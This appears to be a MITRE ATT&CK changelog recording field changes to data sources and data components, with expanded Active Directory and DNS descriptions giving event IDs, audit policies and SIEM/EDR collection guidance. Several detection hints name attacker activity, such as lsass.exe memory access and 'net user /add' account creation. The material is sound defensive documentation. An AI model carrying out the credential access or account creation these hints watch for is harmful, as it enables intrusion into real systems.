| modified | 2021-11-10T09:30:48.696Z | 2025-04-16T20:39:12.054Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0004] Malware Repository
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-12-07T19:49:46.256Z | 2025-04-16T20:39:11.272Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0011] Module
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:12:13.134Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0023] Named Pipe
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-16T20:39:09.639Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0033] Network Share
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:09:58.319Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0021] Persona
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-16T20:39:12.210Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0014] Pod
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-10T09:30:48.697Z | 2025-04-16T20:39:12.521Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0013] Sensor Health
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:40.409Z | 2025-04-16T20:39:11.418Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0020] Snapshot
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-10T09:30:48.698Z | 2025-04-16T20:39:10.827Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0034] Volume
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
| revoked | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.807Z | 2024-11-17T19:42:50.490Z |
| external_references[2]['description'] | Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021. | Microsoft. (n.d.). Azure Blob Storage. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://azure.microsoft.com/en-us/services/storage/blobs/ | https://azure.microsoft.com/en-us/products/storage/blobs/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0005] WMI
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-10T09:30:48.699Z | 2025-04-16T20:39:11.750Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0006] Web Credential
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:08.491Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0024] Windows Registry
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-11T14:00:00.188Z | 2025-04-16T20:39:08.970Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
mobile-attack
Minor Version Changes
[DS0017] Command
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:00.625Z | 2025-04-18T15:11:26.880Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0029] Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:13.356Z | 2025-04-18T15:11:13.424Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0009] Process
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:26.515Z | 2025-04-18T15:10:24.655Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
Patches
[DS0041] Application Vetting
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T19:30:41.131Z | 2025-04-16T21:22:20.420Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0013] Sensor Health
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:40.409Z | 2025-04-16T20:39:11.418Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0042] User Interface
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-13T19:36:25.108Z | 2025-04-16T21:22:20.681Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
ics-attack
Minor Version Changes
[DS0015] Application Log
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:10.207Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[DS0017] Command
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:00.625Z | 2025-04-18T15:11:26.880Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0022] File
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-12-07T19:35:34.863Z | 2025-04-18T15:10:04.845Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_platforms[1] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0028] Logon Session
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:12:19.778Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0029] Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:13.356Z | 2025-04-18T15:11:13.424Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0009] Process
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-20T18:38:26.515Z | 2025-04-18T15:10:24.655Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0003] Scheduled Job
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:11:33.637Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0012] Script
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-12-07T19:50:56.964Z | 2025-04-18T15:12:42.967Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0019] Service
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.807Z | 2025-04-18T15:10:47.833Z |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
[DS0002] User Account
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:09:38.667Z |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
| x_mitre_domains | | ics-attack |
Patches
[DS0039] Asset
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-24T19:14:15.637Z | 2025-04-16T21:26:35.809Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0016] Drive
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.804Z | 2025-04-18T15:12:29.888Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0001] Firmware
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:12:49.401Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0011] Module
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:12:13.134Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0033] Network Share
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:09:58.319Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ics-attack |
[DS0040] Operational Databases
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-24T19:14:55.615Z | 2025-04-16T21:26:35.400Z |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0024] Windows Registry
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-11T14:00:00.188Z | 2025-04-16T20:39:08.970Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Data Components
enterprise-attack
Minor Version Changes
Domain Name: Active DNS
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Queried domain name system (DNS) registry data highlighting | t | "Domain Name: Active DNS" data component captures queried DN |
| current domain to IP address resolutions (ex: dig/nslookup q | | S registry data that highlights current domain-to-IP address |
| ueries) | | resolutions. This data includes both direct queries to DNS |
| | | servers and records that provide mappings between domain nam |
| | | es and associated IP addresses. It serves as a critical reso |
| | | urce for tracking active infrastructure and understanding th |
| | | e network footprint of an organization or adversary. Example |
| | | s: - DNS Query Example: `nslookup example.com`, `dig examp |
| | | le.com A` - PTR Record Example: `dig -x 192.168.1.1` - Track |
| | | ing Malicious Domains: DNS logs reveal repeated queries to s |
| | | uspicious domains like malicious-site.com. The IPs resolved |
| | | by these domains may be indicators of compromise (IOCs). - D |
| | | NS Record Types - A/AAAA Record: Maps domain names to IP |
| | | addresses (IPv4/IPv6). - CNAME Record: Canonical name r |
| | | ecords, often used for redirects. - MX Record: Mail exch |
| | | ange records, used to route emails. - TXT Record: Can in |
| | | clude security information like SPF or DKIM policies. - |
| | | SOA Record: Start of authority record for domain management. |
| | | - NS Record: Lists authoritative name servers for the d |
| | | omain. This data component can be collected through the fol |
| | | lowing measures: - System Utilities: Use built-in tools lik |
| | | e `nslookup`, `dig`, or host on Linux, macOS, and Windows to |
| | | perform active DNS queries. - DNS Logging - Windows DNS |
| | | Server: Enable DNS Analytical Logging to capture DNS querie |
| | | s and responses. - Bind DNS: Enable query logging in the |
| | | named.conf file. - Cloud Provider DNS Logging - AWS Rou |
| | | te 53: Enable query logging through CloudWatch or S3: - |
| | | Google Cloud DNS: Enable logging for Cloud DNS queries throu |
| | | gh Google Cloud Logging. - Network Traffic Monitoring: Use t |
| | | ools like Wireshark or Zeek to analyze DNS queries within ne |
| | | twork traffic. - Security Information and Event Management ( |
| | | SIEM) Integration: Aggregate DNS logs in a SIEM like Splunk |
| | | to create alerts and monitor patterns. - Public OSINT Tools: |
| | | Use OSINT platforms like VirusTotal, or PassiveTotal to col |
| | | lect information on domains and their associated IP addresse |
| | | s. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-02T23:19:55.148Z | 2025-04-18T15:16:37.830Z |
| description | Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries) | "Domain Name: Active DNS" data component captures queried DNS registry data that highlights current domain-to-IP address resolutions. This data includes both direct queries to DNS servers and records that provide mappings between domain names and associated IP addresses. It serves as a critical resource for tracking active infrastructure and understanding the network footprint of an organization or adversary. Examples:
- DNS Query Example: `nslookup example.com`, `dig example.com A`
- PTR Record Example: `dig -x 192.168.1.1`
- Tracking Malicious Domains: DNS logs reveal repeated queries to suspicious domains like malicious-site.com. The IPs resolved by these domains may be indicators of compromise (IOCs).
- DNS Record Types
- A/AAAA Record: Maps domain names to IP addresses (IPv4/IPv6).
- CNAME Record: Canonical name records, often used for redirects.
- MX Record: Mail exchange records, used to route emails.
- TXT Record: Can include security information like SPF or DKIM policies.
- SOA Record: Start of authority record for domain management.
- NS Record: Lists authoritative name servers for the domain.
This data component can be collected through the following measures:
- System Utilities: Use built-in tools like `nslookup`, `dig`, or host on Linux, macOS, and Windows to perform active DNS queries.
- DNS Logging
- Windows DNS Server: Enable DNS Analytical Logging to capture DNS queries and responses.
- Bind DNS: Enable query logging in the named.conf file.
- Cloud Provider DNS Logging
- AWS Route 53: Enable query logging through CloudWatch or S3:
- Google Cloud DNS: Enable logging for Cloud DNS queries through Google Cloud Logging.
- Network Traffic Monitoring: Use tools like Wireshark or Zeek to analyze DNS queries within network traffic.
- Security Information and Event Management (SIEM) Integration: Aggregate DNS logs in a SIEM like Splunk to create alerts and monitor patterns.
- Public OSINT Tools: Use OSINT platforms like VirusTotal, or PassiveTotal to collect information on domains and their associated IP addresses. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Active Directory: Active Directory Credential Request
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | A user requested active directory credentials, such as a tic | t | Requests for authentication credentials via Kerberos or othe |
| ket or token (ex: Windows EID 4769) | | r methods like NTLM and LDAP queries. Examples: - Kerberos |
| | | TGT and Service Tickets (Event IDs 4768, 4769) - NTLM Authen |
| | | tication Events - LDAP Bind Requests *Data Collection Measu |
| | | res:* - Security Event Logging: - Enable "`Audit Kerber |
| | | os Authentication Service`" or "`Audit Kerberos Service Tick |
| | | et Operations`." - Captured Events: IDs 4768, 4769, 4624 |
| | | . - Windows Event Forwarding (WEF): Forward domain controlle |
| | | r logs to SIEM. - SIEM Integration: Use tools like Splunk or |
| | | Azure Sentinel for log analysis. - Kerberos Debug Logging: |
| | | - Registry Key: HKLM\SYSTEM\CurrentControlSet\Control\Ls |
| | | a\Kerberos\Parameters. - Set DWORD LogLevel to 1. - Azur |
| | | e AD Logs: Monitor Sign-In Logs for authentication and polic |
| | | y issues. - Enable EDR Monitoring: - Use EDR to detect s |
| | | uspicious processes querying authentication mechanisms (e.g. |
| | | , lsass.exe memory access). |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:14.586Z |
| description | A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769) | Requests for authentication credentials via Kerberos or other methods like NTLM and LDAP queries. Examples:
- Kerberos TGT and Service Tickets (Event IDs 4768, 4769)
- NTLM Authentication Events
- LDAP Bind Requests
*Data Collection Measures:*
- Security Event Logging:
- Enable "`Audit Kerberos Authentication Service`" or "`Audit Kerberos Service Ticket Operations`."
- Captured Events: IDs 4768, 4769, 4624.
- Windows Event Forwarding (WEF): Forward domain controller logs to SIEM.
- SIEM Integration: Use tools like Splunk or Azure Sentinel for log analysis.
- Kerberos Debug Logging:
- Registry Key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters.
- Set DWORD LogLevel to 1.
- Azure AD Logs: Monitor Sign-In Logs for authentication and policy issues.
- Enable EDR Monitoring:
- Use EDR to detect suspicious processes querying authentication mechanisms (e.g., lsass.exe memory access). |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Active Directory: Active Directory Object Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening of an active directory object, typically to collect/ | t | Object access refers to activities where AD objects (e.g., u |
| read its value (ex: Windows EID 4661) | | ser accounts, groups, policies) are accessed or queried. Exa |
| | | mple: Windows Event ID 4661 logs object access attempts. Exa |
| | | mples: - Attribute Access: e.g., `userPassword`, `memberOf` |
| | | , `securityDescriptor`. - Group Enumeration: Enumerating cri |
| | | tical group members (e.g., Domain Admins). - User Attributes |
| | | : Commonly accessed attributes like `samAccountName`, `lastL |
| | | ogonTimestamp`. - Policy Access: Accessing GPOs to understan |
| | | d security settings. *Data Collection Measures:* - Audit P |
| | | olicies: - Enable "Audit Directory Service Access" under |
| | | Advanced Audit Policies (Success and Failure). - Path: |
| | | `Computer Configuration > Policies > Windows Settings > Secu |
| | | rity Settings > Advanced Audit Policy Configuration > Audit |
| | | Policies > Object AccessEnable: Audit Directory Service Acce |
| | | ss` (Success and Failure). - Captured Events: IDs 4661, |
| | | 4662. - Event Forwarding: Use WEF to centralize logs for SIE |
| | | M analysis. - SIEM Integration: Collect and parse logs (e.g. |
| | | , 4661, 4662) using tools like Splunk or Azure Sentinel. - L |
| | | og Filtering: - Focus on sensitive objects/attributes like: |
| | | - `Domain Admins` group. - `userPassword`, `ntSecuri |
| | | tyDescriptor`. - Enable EDR Monitoring: - Detect process |
| | | es accessing sensitive AD objects (e.g., samAccountName, sec |
| | | urityDescriptor). - Log all attempts to enumerate critic |
| | | al groups (e.g., "Domain Admins"). |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:08.230Z |
| description | Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661) | Object access refers to activities where AD objects (e.g., user accounts, groups, policies) are accessed or queried. Example: Windows Event ID 4661 logs object access attempts. Examples:
- Attribute Access: e.g., `userPassword`, `memberOf`, `securityDescriptor`.
- Group Enumeration: Enumerating critical group members (e.g., Domain Admins).
- User Attributes: Commonly accessed attributes like `samAccountName`, `lastLogonTimestamp`.
- Policy Access: Accessing GPOs to understand security settings.
*Data Collection Measures:*
- Audit Policies:
- Enable "Audit Directory Service Access" under Advanced Audit Policies (Success and Failure).
- Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Object AccessEnable: Audit Directory Service Access` (Success and Failure).
- Captured Events: IDs 4661, 4662.
- Event Forwarding: Use WEF to centralize logs for SIEM analysis.
- SIEM Integration: Collect and parse logs (e.g., 4661, 4662) using tools like Splunk or Azure Sentinel.
- Log Filtering:
- Focus on sensitive objects/attributes like:
- `Domain Admins` group.
- `userPassword`, `ntSecurityDescriptor`.
- Enable EDR Monitoring:
- Detect processes accessing sensitive AD objects (e.g., samAccountName, securityDescriptor).
- Log all attempts to enumerate critical groups (e.g., "Domain Admins"). |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Active Directory: Active Directory Object Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new active directory object (ex: W | t | Creating new objects in AD, such as user accounts, groups, o |
| indows EID 5137) | | rganizational units (OUs), or trust relationships. Logged as |
| | | Event ID 5137. Examples: - User Account Creation: New user |
| | | account. - Group Creation: New security/distribution group. |
| | | - OU Creation: New organizational unit. - Service Account C |
| | | reation: New service account for automation or malicious tas |
| | | ks. - Trust Object Creation: Trust relationship with another |
| | | domain. *Data Collection Measures:* - Audit Policy: - |
| | | Enable "Audit Directory Service Changes" (Success and Failu |
| | | re). - Path: `Computer Configuration > Policies > Window |
| | | s Settings > Security Settings > Advanced Audit Policy Confi |
| | | guration > Audit Policies > Directory Service Changes`. |
| | | - Key Event: Event ID 5137 (object creation). - Log Forwardi |
| | | ng: Use WEF to centralize logs for SIEM tools (e.g., Splunk) |
| | | . - Enable EDR Monitoring: - Track processes that create |
| | | new accounts or modify AD objects. - Correlate object c |
| | | reation with suspicious commands (e.g., net user /add). |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:20.946Z |
| description | Initial construction of a new active directory object (ex: Windows EID 5137) | Creating new objects in AD, such as user accounts, groups, organizational units (OUs), or trust relationships. Logged as Event ID 5137. Examples:
- User Account Creation: New user account.
- Group Creation: New security/distribution group.
- OU Creation: New organizational unit.
- Service Account Creation: New service account for automation or malicious tasks.
- Trust Object Creation: Trust relationship with another domain.
*Data Collection Measures:*
- Audit Policy:
- Enable "Audit Directory Service Changes" (Success and Failure).
- Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Directory Service Changes`.
- Key Event: Event ID 5137 (object creation).
- Log Forwarding: Use WEF to centralize logs for SIEM tools (e.g., Splunk).
- Enable EDR Monitoring:
- Track processes that create new accounts or modify AD objects.
- Correlate object creation with suspicious commands (e.g., net user /add). |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Active Directory: Active Directory Object Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of an active directory object (ex: Windows EID 5141) | t | Object deletion in AD (e.g., user accounts, groups, OUs) is |
| | | logged as Event ID 5141. Examples: - User Account: Deleted |
| | | user. - Group: Deleted security/distribution group. - Organi |
| | | zational Unit (OU): Loss of configurations or policies. - Se |
| | | rvice Account: Disrupted operations or cover tracks. - Trust |
| | | Object: Removed domain trust, disrupting connectivity. *Da |
| | | ta Collection Measures:* - Audit Policy: - Enable "Audi |
| | | t Directory Service Changes" (Success and Failure). - Pa |
| | | th: `Computer Configuration > Policies > Windows Settings > |
| | | Security Settings > Advanced Audit Policy Configuration > Au |
| | | dit Policies > Directory Service Changes`. - Key Event: |
| | | Event ID 5141. - Log Forwarding: Use WEF to centralize logs |
| | | for SIEM tools (e.g., Splunk). - Enable EDR Monitoring: |
| | | - Detect processes or users that initiate unauthorized objec |
| | | t deletions. - Monitor tools and scripts that may delete |
| | | key directory objects. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:17.768Z |
| description | Removal of an active directory object (ex: Windows EID 5141) | Object deletion in AD (e.g., user accounts, groups, OUs) is logged as Event ID 5141. Examples:
- User Account: Deleted user.
- Group: Deleted security/distribution group.
- Organizational Unit (OU): Loss of configurations or policies.
- Service Account: Disrupted operations or cover tracks.
- Trust Object: Removed domain trust, disrupting connectivity.
*Data Collection Measures:*
- Audit Policy:
- Enable "Audit Directory Service Changes" (Success and Failure).
- Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Directory Service Changes`.
- Key Event: Event ID 5141.
- Log Forwarding: Use WEF to centralize logs for SIEM tools (e.g., Splunk).
- Enable EDR Monitoring:
- Detect processes or users that initiate unauthorized object deletions.
- Monitor tools and scripts that may delete key directory objects. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Active Directory: Active Directory Object Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to an active directory object (ex: Windows EID | t | Changes to AD objects (e.g., users, groups, OUs) are logged |
| 5163 or 5136) | | as Event ID 5136 (Object Modification) or 5163 (Attribute Ch |
| | | anges). Examples: - User Account: Modifying attributes (e.g |
| | | ., group membership, enabling/disabling accounts). - Group M |
| | | embership: Adding/removing members. - OU: Changing propertie |
| | | s/permissions (e.g., delegation). - Service Account: Modifyi |
| | | ng SPNs or other attributes. - Object Attributes: Changes to |
| | | passwords, logon hours, or control flags. *Data Collection |
| | | Measures:* - Audit Policy: - Enable "Audit Directory S |
| | | ervice Changes" (Success and Failure). - Path: `Computer |
| | | Configuration > Policies > Windows Settings > Security Sett |
| | | ings > Advanced Audit Policy Configuration > Audit Policies |
| | | > Directory Service Changes`. - Key Events: 5136 (modifi |
| | | cations), 5163 (attribute changes). - Log Forwarding: - |
| | | Use WEF to centralize logs for SIEM. - Parse logs to ext |
| | | ract: Object Name, Attribute Changed, Initiator Account Name |
| | | . - Enable EDR Monitoring: - Detect changes to critical |
| | | attributes (e.g., memberOf, logonHours). - Track process |
| | | es modifying directory service objects (e.g., Set-ADUser or |
| | | dsmod). - Enable EDR Monitoring: - Detect changes to cri |
| | | tical attributes (e.g., memberOf, logonHours). - Track p |
| | | rocesses modifying directory service objects (e.g., Set-ADUs |
| | | er or dsmod). |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:14:11.376Z |
| description | Changes made to an active directory object (ex: Windows EID 5163 or 5136) | Changes to AD objects (e.g., users, groups, OUs) are logged as Event ID 5136 (Object Modification) or 5163 (Attribute Changes). Examples:
- User Account: Modifying attributes (e.g., group membership, enabling/disabling accounts).
- Group Membership: Adding/removing members.
- OU: Changing properties/permissions (e.g., delegation).
- Service Account: Modifying SPNs or other attributes.
- Object Attributes: Changes to passwords, logon hours, or control flags.
*Data Collection Measures:*
- Audit Policy:
- Enable "Audit Directory Service Changes" (Success and Failure).
- Path: `Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Directory Service Changes`.
- Key Events: 5136 (modifications), 5163 (attribute changes).
- Log Forwarding:
- Use WEF to centralize logs for SIEM.
- Parse logs to extract: Object Name, Attribute Changed, Initiator Account Name.
- Enable EDR Monitoring:
- Detect changes to critical attributes (e.g., memberOf, logonHours).
- Track processes modifying directory service objects (e.g., Set-ADUser or dsmod).
- Enable EDR Monitoring:
- Detect changes to critical attributes (e.g., memberOf, logonHours).
- Track processes modifying directory service objects (e.g., Set-ADUser or dsmod). |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Application Log: Application Log Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logging, messaging, and other artifacts provided by third-pa | t | Application Log Content refers to logs generated by applicat |
| rty services (ex: metrics, errors, and/or alerts from mail/w | | ions or services, providing a record of their activity. Thes |
| eb applications) | | e logs may include metrics, errors, performance data, and op |
| | | erational alerts from web, mail, or other applications. Thes |
| | | e logs are vital for monitoring application behavior and det |
